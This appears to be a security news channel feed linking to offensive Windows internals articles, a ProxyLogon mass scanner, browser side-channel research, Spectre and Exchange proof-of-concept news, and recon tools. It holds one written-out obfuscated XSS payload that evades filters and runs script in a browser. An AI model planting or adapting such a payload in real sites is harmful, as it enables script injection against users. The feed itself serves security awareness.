EDR and Blending In: How Attackers Avoid Getting Caught
Part 2 of the series
https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught
#Offensive_security
Offensive Windows IPC Internals 2: RPC
https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html
Offensive Windows IPC Internals 1: Named Pipes
https://csandker.io/2021/01/10/Offensive-Windows-IPC-1-NamedPipes.html
<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
XSS Payload
dwisiswant0/proxylogscan - A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate the admin (CVE-2021-26855) / ProxyLogon.
https://ift.tt/3cgBplO
Browser exploit via side channel attack: Researchers have discovered a new side-channel that they say can be reliably exploited to leak information from web browsers that could then be leveraged to track users even when JavaScript is completely disabled.
"This is a side-channel attack which doesn't require any JavaScript to run," the researchers said. "This means noscript blockers cannot stop it. The attacks work even if you strip out all of the fun parts of the web browsing experience. This makes it very difficult to prevent without modifying deep parts of the operating system."
https://arxiv.org/abs/2103.04952
https://thehackernews.com/2021/03/new-browser-attack-allows-tracking.html
Microsoft's GitHub under fire after disappearing proof-of-concept exploit for critical Microsoft Exchange vuln.
On Wednesday, shortly after security researcher Nguyen Jang posted a proof-of-concept exploit on GitHub that abuses a Microsoft Exchange vulnerability revealed earlier this month, GitHub, which is owned by Microsoft, removed the code, to the alarm of security researchers.
Google has released proof-of-concept code for conducting a Spectre-based attack against its Chrome browser to show how web developers can take steps to mitigate browser-based side-channel attacks.
Exploit Code repo: https://github.com/google/security-research-pocs/tree/master/spectre.js
https://www.theregister.com/2021/03/12/google_spectre_code/
Forwarded from P0SCon
"DDOS Attack in Real" by Amir Kiani, LIVE NOW.
You can join the live Q&A after the presentation at 16:45 PM IRST (13:15 PM GMT); we have a live Q&A with the presenters on the Discord server.
https://www.youtube.com/watch?v=Lwwdhkm6qBI&list=PLWCWUHzTw-g-42Fxr5X1cOZQiar5APpI4&index=14
DDOS: Big Damage, Low Price, Hard To Defend By Amir Kiani in P0SCon2021
Forwarded from Security Analysis
Crimson is a tool that automates some of the Pentester or Bug Bounty Hunter tasks. It uses many open source tools, most of which are available for download from GitHub.
https://github.com/Karmaz95/crimson
#tools #recon #bugbounty
@securation